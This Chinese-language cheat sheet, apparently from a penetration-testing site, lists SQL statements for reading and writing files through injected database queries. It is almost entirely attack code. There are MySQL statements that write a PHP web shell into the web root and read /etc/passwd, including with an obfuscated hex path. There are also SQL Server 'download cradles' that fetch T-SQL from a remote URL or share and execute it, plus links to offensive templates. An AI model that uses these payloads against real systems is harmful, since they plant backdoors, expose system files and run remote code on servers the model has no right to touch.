读取和写入文件有助于信息收集。包括写入webshell,或允许数据通过80/443端口传输。
MySQL
*需要特权用户
| 描述 | 语句 |
|---|---|
| 转储到文件 | SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’ |
| 写入 PHP Shell 到文件 | SELECT ‘system($_GET[‘c’]); ?>’ INTO OUTFILE ‘/var/www/shell.php’ |
| 读文件 | SELECT LOAD_FILE(‘/etc/passwd’) |
| 读取混淆的文件 | SELECT LOAD_FILE(0x633A5C626F6F742E696E69) reads c:\boot.ini |
| 文件权限 | SELECT file_priv FROM mysql.user WHERE user = ‘netspi’ SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%netspi%’ |
Oracle
有时可以使用UTL_FILE。检查以下是否为非null
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
如果安装了Java(Oracle Express中不可用),可用于读取和写入文件。
SQL Server
*需要特权用户
| 描述 | 语句 |
|---|---|
| 在服务器中下载Cradle bulk – TSQL | — Bulk Insert – Download Cradle Example — Setup variables Declare @cmd varchar(8000) — Create temp table CREATE TABLE #file (content nvarchar(4000)); — Read file into temp table – web server must support propfind BULK INSERT #file FROM ‘\sharepoint.acme.com@SSL\Path\to\file.txt’; — Select contents of file SELECT @cmd = content FROM #file — Display command SELECT @cmd — Run command EXECUTE(@cmd) — Drop the temp table DROP TABLE #file |
| 下载Cradle OAP 1 – SQL | — OLE Automation Procedure – Download Cradle Example — Does not require a table, but can’t handle larger payloads — Note: This also works with unc paths \\ip\file.txt — Note: This also works with webdav paths \ip@80\file.txt However, the target web server needs to support propfind. — Setup Variables DECLARE @url varchar(300) DECLARE @WinHTTP int DECLARE @handle int DECLARE @Command varchar(8000 — Set target url containting TSQL SET @url = ‘http://127.0.0.1/mycmd.txt’ — Setup namespace EXEC @handle=sp_OACreate ‘WinHttp.WinHttpRequest.5.1’,@WinHTTP OUT — Call the Open method to setup the HTTP request EXEC @handle=sp_OAMethod @WinHTTP, ‘Open’,NULL,’GET’,@url,’false’ — Call the Send method to send the HTTP GET request EXEC @handle=sp_OAMethod @WinHTTP,’Send’ — Capture the HTTP response content EXEC @handle=sp_OAGetProperty @WinHTTP,’ResponseText’, @Command out — Destroy the object EXEC @handle=sp_OADestroy @WinHTTP — Display command SELECT @Command — Run command EXECUTE (@Command) |
| 下载Cradle OAP 2 – TSQL | — OLE Automation Procedure – Download Cradle Example – Option 2 — Can handle larger payloads, but requires a table — Note: This also works with unc paths \ip\file.txt — Note: This also works with webdav paths \ip@80\file.txt However, the target web server needs to support propfind. — Setup Variables DECLARE @url varchar(300) DECLARE @WinHTTP int DECLARE @Handle int DECLARE @Command varchar(8000) — Set target url containting TSQL SET @url = ‘http://127.0.0.1/mycmd.txt’ — Create temp table to store downloaded string CREATE TABLE #text(html text NULL) — Setup namespace EXEC @Handle=sp_OACreate ‘WinHttp.WinHttpRequest.5.1’,@WinHTTP OUT — Call open method to configure HTTP request EXEC @Handle=sp_OAMethod @WinHTTP, ‘Open’,NULL,’GET’,@url,’false’ — Call Send method to send the HTTP request EXEC @Handle=sp_OAMethod @WinHTTP,’Send’ — Capture the HTTP response content INSERT #text(html) EXEC @Handle=sp_OAGetProperty @WinHTTP,’ResponseText’ — Destroy the object EXEC @Handle=sp_OADestroy @WinHTTP — Display the commad SELECT @Command = html from #text SELECT @Command — Run the command EXECUTE (@Command) — Remove temp table DROP TABLE #text |
| 读取文件 – TSQL | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceTxt.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_BulkInsert.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceXlsx https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetBulk.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetTxt.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetXlsx.sql |
| 写文件 – TSQL | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_bulkinsert.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_OpenRowSetTxt.sql |
文章最后更新于 2021-09-22
